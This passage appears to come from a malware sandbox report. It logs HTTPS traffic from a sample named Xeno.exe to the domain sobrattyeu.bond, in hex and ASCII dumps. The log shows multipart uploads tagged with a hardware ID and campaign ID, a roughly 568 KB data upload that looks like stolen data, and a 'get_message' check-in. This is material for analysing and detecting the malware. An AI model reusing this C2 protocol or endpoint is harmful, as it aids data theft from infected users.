                          2025-01-15 15:16:25 UTC15331OUTData Raw: 2d 2d 57 4c 4d 4f 4e 48 56 38 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 44 44 31 34 31 32 32 30 33 33 44 44 32 42 43 36 31 42 41 33 42 41 44 38 38 36 32 42 36 32 0d 0a 2d 2d 57 4c 4d 4f 4e 48 56 38 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 4c 4d 4f 4e 48 56 38 54 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 57 4c 4d 4f 4e 48 56 38 54 4e 0d 0a 43 6f 6e 74
                          Data Ascii: --WLMONHV8TNContent-Disposition: form-data; name="hwid"48DD14122033DD2BC61BA3BAD8862B62--WLMONHV8TNContent-Disposition: form-data; name="pid"3--WLMONHV8TNContent-Disposition: form-data; name="lid"yau6Na--914510980--WLMONHV8TNCont
                          2025-01-15 15:16:25 UTC5062OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1
                          Data Ascii: lrQMn 64F6(X&7~`aO@
                          2025-01-15 15:16:26 UTC1129INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=9d8gciemfv3oo4ji5t9s5fue9c; expires=Sun, 11 May 2025 09:03:04 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PF%2BiCL7D5z2wf69mFVbiKy1b66FeH%2FWUKvCaMRIVZYfc1GlBSlwoP43wf5avAVCw90FtyOpz3kcQh11BGoDu8ynueO0fi689cbfH%2FD9%2BxavkE6lnMHSPAWNbb8qShdnNpVo%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3abfe431a48-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2016&rtt_var=763&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21346&delivery_rate=1428571&cwnd=157&unsent_bytes=0&cid=1792f5bc75d41415&ts=650&x=0"
                          2025-01-15 15:16:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                          Data Ascii: fok 8.46.123.189
                          2025-01-15 15:16:26 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.449748104.21.96.14433020C:\Users\user\Desktop\Xeno.exe
                          TimestampBytes transferredDirectionData
                          2025-01-15 15:16:26 UTC276OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=WWDJ5BXJR9T6I9
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 1391
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:26 UTC1391OUTData Raw: 2d 2d 57 57 44 4a 35 42 58 4a 52 39 54 36 49 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 44 44 31 34 31 32 32 30 33 33 44 44 32 42 43 36 31 42 41 33 42 41 44 38 38 36 32 42 36 32 0d 0a 2d 2d 57 57 44 4a 35 42 58 4a 52 39 54 36 49 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 57 44 4a 35 42 58 4a 52 39 54 36 49 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 57 57 44 4a
                          Data Ascii: --WWDJ5BXJR9T6I9Content-Disposition: form-data; name="hwid"48DD14122033DD2BC61BA3BAD8862B62--WWDJ5BXJR9T6I9Content-Disposition: form-data; name="pid"1--WWDJ5BXJR9T6I9Content-Disposition: form-data; name="lid"yau6Na--914510980--WWDJ
                          2025-01-15 15:16:27 UTC1124INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:27 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=fau0edsenfe0gqftrpmmiqe5lj; expires=Sun, 11 May 2025 09:03:06 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dVk4xzJm%2FC1ZmHbXl0TJbsgtjonv0Y855K%2ByVoZ1sZcoYrWLmdxmJ5FYYcM65UMBY5VH7oCLQuTwxqKXcIkySC7KHBGCcHQM6VUi01EH3rxK5%2BV25fK0MxnQVlQHfWcjBmw%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3b3bd2b4363-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1643&rtt_var=810&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2303&delivery_rate=1777236&cwnd=240&unsent_bytes=0&cid=1098b262a0057f00&ts=749&x=0"
                          2025-01-15 15:16:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                          Data Ascii: fok 8.46.123.189
                          2025-01-15 15:16:27 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.449749104.21.96.14433020C:\Users\user\Desktop\Xeno.exe
                          TimestampBytes transferredDirectionData
                          2025-01-15 15:16:28 UTC276OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: multipart/form-data; boundary=RFRJMFWTEQN7
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 568321
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:28 UTC15331OUTData Raw: 2d 2d 52 46 52 4a 4d 46 57 54 45 51 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 44 44 31 34 31 32 32 30 33 33 44 44 32 42 43 36 31 42 41 33 42 41 44 38 38 36 32 42 36 32 0d 0a 2d 2d 52 46 52 4a 4d 46 57 54 45 51 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 46 52 4a 4d 46 57 54 45 51 4e 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 52 46 52 4a 4d 46 57 54 45 51
                          Data Ascii: --RFRJMFWTEQN7Content-Disposition: form-data; name="hwid"48DD14122033DD2BC61BA3BAD8862B62--RFRJMFWTEQN7Content-Disposition: form-data; name="pid"1--RFRJMFWTEQN7Content-Disposition: form-data; name="lid"yau6Na--914510980--RFRJMFWTEQ
                          2025-01-15 15:16:28 UTC15331OUTData Raw: d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16 6a 06 95 e2 86 7e 23 94 8f 49 f2 39 93 f8 cc ec b4 d6 d5 15 c8 a9 1d 49 ab c2 6b 11 22 83 de ce 18 23
                          Data Ascii: yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]j~#I9Ik"#
                          2025-01-15 15:16:28 UTC15331OUTData Raw: 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23 5d 02 9a d0 ae 25 37 a8 d7 51 e2 57 91 de b7 12 82 89 97 94 9b e0 a5 12 98 77 56 3d 57 d4 7a f1 96 e9
                          Data Ascii: [*BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIELX;"&#ysH {x2~#]%7QWwV=Wz
                          2025-01-15 15:16:28 UTC15331OUTData Raw: 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5 03 fb 77 6f c4 fd 4e a8 21 f3 73 2e 11 0a 9a 96 b2 7d 39 1e 4e ba 58 c2 a6 80 52 43 3c 4e c8 ea ab 99 18 ea 1d 12
                          Data Ascii: H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;woN!s.}9NXRC<N
                          2025-01-15 15:16:28 UTC15331OUTData Raw: 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa ea b7 65 14 eb 98 8b f7 ff 56 51 fc 7f 5f 10 9c 8d 84 47 02 b8 44 45 c6 36 04 1f 53 65 9c ed 0f 95 fd 8f 14 cd 53
                          Data Ascii: 2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>heVQ_GDE6SeS
                          2025-01-15 15:16:28 UTC15331OUTData Raw: ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83 3f 0a 7d 47 87 c2 7a 44 5b 0f a4 d7 87 51 a8 75 b8 4c db 1f 53 5a 6d 53 2c 1b de 3d b8 6e 2b 4a e8 a1 72 76 d6 83
                          Data Ascii: @7W}TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpacFG)*,?}GzD[QuLSZmS,=n+Jrv
                          2025-01-15 15:16:28 UTC15331OUTData Raw: 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84 c2 0b 0d 5d be 7b f6 b3 2f 63 66 93 b7 96 a0 30 0a 97 41 fe 61 72 86 b3 fb 6e b0 75 73 42 6b 21 be ed e2 7e 14 6c
                          Data Ascii: 4SMAIph! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t|CI]{/cf0AarnusBk!~l
                          2025-01-15 15:16:28 UTC15331OUTData Raw: 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04 4d ca 30 90 70 bd 01 d8 31 ee 4d fd 0e 90 27 1c 61 2f 0a a8 f9 72 ef 5a 57 95 bd 95 e3 75 5b b1 1b 2b 6b 57 f3 4f
                          Data Ascii: A^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhSIaW)]u^R<M0p1M'a/rZWu[+kWO
                          2025-01-15 15:16:28 UTC15331OUTData Raw: f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d 98 36 98 ac 3a ce d4 1f 5f 3f 13 15 1a 20 32 20 94 ac f4 63 e6 a4 89 69 4d a7 c1 4a d8 7f 9b 1a 9e 21 18 a7 09 ff
                          Data Ascii: -=c^*}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]6:_? 2 ciMJ!
                          2025-01-15 15:16:28 UTC15331OUTData Raw: e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9 9b 45 f0 ae ae c8 c7 44 f6 c8 e7 85 35 b1 fc cb b3 4c 8d d1 80 bc 4e 35 e7 13 32 19 ec b5 fd 36 68 ce 85 2b 44 6f
                          Data Ascii: g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6ED5LN526h+Do
                          2025-01-15 15:16:33 UTC1137INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=varqjrh32uc08dbb2frru12ji2; expires=Sun, 11 May 2025 09:03:08 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SJ%2BI87NC3%2FqOAR3xu2SuKevGMxsi6mQpAQeTkDsP2G2Cq5%2FuJbn%2Fuu9wMkaExlb0HK8vklcU4kRtgUG7Pt7tNPt6WGFhpQWGbYFt8qkUScpXrcWNa2HAElkCbwS%2FXjA%2BMzE%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3beca5072a4-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=1994&rtt_var=757&sent=201&recv=589&lost=0&retrans=0&sent_bytes=2836&recv_bytes=570861&delivery_rate=1464393&cwnd=212&unsent_bytes=0&cid=a733e151f9eac5c5&ts=5306&x=0"


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.449750104.21.96.14433020C:\Users\user\Desktop\Xeno.exe
                          TimestampBytes transferredDirectionData
                          2025-01-15 15:16:34 UTC263OUTPOST /api HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                          Content-Length: 86
                          Host: sobrattyeu.bond
                          2025-01-15 15:16:34 UTC86OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 26 6a 3d 26 68 77 69 64 3d 34 38 44 44 31 34 31 32 32 30 33 33 44 44 32 42 43 36 31 42 41 33 42 41 44 38 38 36 32 42 36 32
                          Data Ascii: act=get_message&ver=4.0&lid=yau6Na--914510980&j=&hwid=48DD14122033DD2BC61BA3BAD8862B62
                          2025-01-15 15:16:34 UTC1124INHTTP/1.1 200 OK
                          Date: Wed, 15 Jan 2025 15:16:34 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Set-Cookie: PHPSESSID=a8m0q7dl90pmjb2v8lotmi0in2; expires=Sun, 11 May 2025 09:03:13 GMT; Max-Age=9999999; path=/
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: no-store, no-cache, must-revalidate
                          Pragma: no-cache
                          X-Frame-Options: DENY
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 1; mode=block
                          cf-cache-status: DYNAMIC
                          vary: accept-encoding
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dXfffPP0zTwe0iGBL3fzPBCHFrou2QD%2F6lgpwigkUZyoQfBEeubyeo1gOePK9ZMcCZ%2F1RTtqVL2JZ1KlScy4AdOpOecS02%2BZpgzailFiW00lcm%2BhJ0UFqAdzaJwpVg1I6U%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 9026d3e33eab42c0-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4212&recv_bytes=985&delivery_rate=303439&cwnd=212&unsent_bytes=0&cid=700602c31f8e8db3&ts=520&x=0"
                          2025-01-15 15:16:34 UTC245INData Raw: 34 37 65 0d 0a 34 36 38 55 76 70 4e 74 6a 37 45 6d 56 34 47 42 74 41 47 43 77 2f 6f 4d 6a 67 53 69 49 43 6b 58 75 77 44 37 32 56 65 6a 32 62 36 34 31 44 62 59 35 30 2b 31 67 41 70 31 35 4b 4f 4f 4d 4b 37 68 6e 69 36 30 4a 73 70 56 66 32 50 73 56 64 43 4c 59 64 4c 72 7a 4b 2f 68 57 66 48 78 56 4f 4b 61 46 6e 7a 4c 73 4e 64 46 74 61 6d 51 65 4d 4a 59 6a 56 4e 42 53 35 52 63 31 4a 51 74 6c 5a 54 54 75 39 56 59 79 4f 73 37 31 65 56 57 48 2f 44 7a 31 54 6e 78 38 34 30 35 2b 44 62 41 46 33 30 6a 31 56 61 4d 69 53 4c 73 6c 6f 36 56 38 7a 76 48 32 7a 47 67 69 56 77 48 37 76 6a 75 5a 38 75 68 6c 6d 37 59 61 50 4a 4c 54 47 62 50 63 59 4b 6a 41 2b 65 30 34 73 7a 31 59 73 72 44 42 4f 76 70 5a 33 79 31 74 59 4e 53 33 75 7a 4e 52 65 68 59
